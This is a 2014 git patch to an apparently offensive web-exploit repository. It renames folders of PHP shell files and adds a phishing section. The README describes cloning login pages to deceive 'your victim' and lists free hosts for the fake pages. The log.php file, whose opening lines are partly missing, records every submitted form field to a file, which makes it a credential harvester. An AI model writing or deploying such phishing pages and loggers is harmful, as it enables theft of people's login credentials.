From a0c026ca273891949ebceb7cd11abb253e40cbf3 Mon Sep 17 00:00:00 2001 From: bt3gl Date: Wed, 19 Nov 2014 15:03:57 -0500 Subject: [PATCH] phishing --- .../exploit_13.php | 0 .../phpprimer_v0.1.pdf | 0 .../{PHP_shells => PHP_shellcodes}/xor.php | 0 Web_Exploits/Phishing/README.md | 18 ++++++++++++++++++ Web_Exploits/Phishing/log.php | 13 +++++++++++++ 5 files changed, 31 insertions(+) rename Web_Exploits/{PHP_shells => PHP_shellcodes}/exploit_13.php (100%) rename Web_Exploits/{PHP_shells => PHP_shellcodes}/phpprimer_v0.1.pdf (100%) rename Web_Exploits/{PHP_shells => PHP_shellcodes}/xor.php (100%) create mode 100644 Web_Exploits/Phishing/README.md create mode 100644 Web_Exploits/Phishing/log.php diff --git a/Web_Exploits/PHP_shells/exploit_13.php b/Web_Exploits/PHP_shellcodes/exploit_13.php similarity index 100% rename from Web_Exploits/PHP_shells/exploit_13.php rename to Web_Exploits/PHP_shellcodes/exploit_13.php diff --git a/Web_Exploits/PHP_shells/phpprimer_v0.1.pdf b/Web_Exploits/PHP_shellcodes/phpprimer_v0.1.pdf similarity index 100% rename from Web_Exploits/PHP_shells/phpprimer_v0.1.pdf rename to Web_Exploits/PHP_shellcodes/phpprimer_v0.1.pdf diff --git a/Web_Exploits/PHP_shells/xor.php b/Web_Exploits/PHP_shellcodes/xor.php similarity index 100% rename from Web_Exploits/PHP_shells/xor.php rename to Web_Exploits/PHP_shellcodes/xor.php diff --git a/Web_Exploits/Phishing/README.md b/Web_Exploits/Phishing/README.md new file mode 100644 index 0000000..301ed17 --- /dev/null +++ b/Web_Exploits/Phishing/README.md @@ -0,0 +1,18 @@ +# Phishing + +* Way of deceiving your victim by making him/her login through one of your webpages which is the clone of the original. + +* Fake login/scamming pages which are often to hack identification information. + +## Tools + +### Free Hostings: + +- http://www.my3gb.com/ +- http://110mb.com/ +- http://www.freehostia.com/ +- http://www.awardspace.com/ +- http://prohosts.org/ +- http://www.000webhost.com/ +- http://www.atspace.com/ +- http://zymic.com/ diff --git a/Web_Exploits/Phishing/log.php b/Web_Exploits/Phishing/log.php new file mode 100644 index 0000000..14bea32 --- /dev/null +++ b/Web_Exploits/Phishing/log.php @@ -0,0 +1,13 @@ + $value) { + fwrite($handle, $variable); + fwrite($handle, "="); + fwrite($handle, $value); + fwrite($handle, "\r\n"); } +fwrite($handle,"\r\n"); +fclose($handle); +exit; +?> +